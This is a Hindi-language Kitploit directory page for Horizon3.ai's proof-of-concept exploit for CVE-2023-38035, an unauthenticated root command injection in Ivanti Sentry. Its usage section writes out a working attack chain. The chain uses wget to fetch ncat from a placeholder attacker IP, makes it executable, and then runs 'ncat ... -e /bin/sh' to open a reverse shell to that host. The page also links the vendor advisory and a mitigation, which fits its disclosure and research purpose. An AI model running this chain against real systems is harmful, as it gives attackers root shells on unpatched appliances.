Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-38035 — CVE-2023-38035 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Ivanti Sentry में एक अप्रमाणित कमांड इंजेक्शन जो ncat के माध्यम से मनमाना रूट कमांड निष्पादन और रिवर्स शेल सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/horizon3ai/cve-2023-38035
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubhorizon3ai/cve-2023-38035

CVE-2023-38035

CVE-2023-38035 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Ivanti Sentry में एक अप्रमाणित कमांड इंजेक्शन जो ncat के माध्यम से मनमाना रूट कमांड निष्पादन और रिवर्स शेल सक्षम बनाता है।

रिपॉजिटरी देखें
411233 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-38035

Ivanti Sentry को प्रभावित करने वाला POC for CVE-2023-38035

तकनीकी विश्लेषण

इस कमजोरी का तकनीकी मूल कारण विश्लेषण हमारे ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive

सारांश

यह POC एक अप्रमाणित कमांड इंजेक्शन का दुरुपयोग करके रूट उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करता है।

निष्पादन संदर्भ कमांड पाइपिंग की अनुमति नहीं देता है, और सिस्टम आसानी से दुरुपयोग करने योग्य बाइनरी के साथ नहीं आता है, इसलिए कमांड को श्रृंखलित किया जा सकता है ताकि https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/ncat जैसी जगह से एक स्थिर ncat डाउनलोड किया जा सके।

उपयोग

root@kitploit:~
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'wget http://123.123.123.123:8000/ncat -O /tmp/ncat'
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'chmod +x /tmp/ncat' 
[+] Successfully executed command on target!
python3 CVE-2023-38035.py -u https://<target>:8443/ -c 'sudo /tmp/ncat 123.123.123.123 4444 -e /bin/sh'
[+] Successfully executed command on target!

Shell

शमन उपाय

Ivanti सलाहकार के निर्देशों के अनुसार नवीनतम संस्करण में अपडेट करें

  • https://forums.ivanti.com/s/article/KB-API-Authentication-Bypass-on-Sentry-Administrator-Interface-CVE-2023-38035?language=en_US

नवीनतम सुरक्षा अनुसंधान के लिए Twitter पर Horizon3.ai Attack Team को फॉलो करें:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

अस्वीकरण

यह सॉफ्टवेयर विशुद्ध रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और इसका उपयोग सिस्टम पर हमला करने के लिए नहीं किया जाना है, सिवाय उन मामलों के जहां स्पष्ट रूप से अधिकृत किया गया हो। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें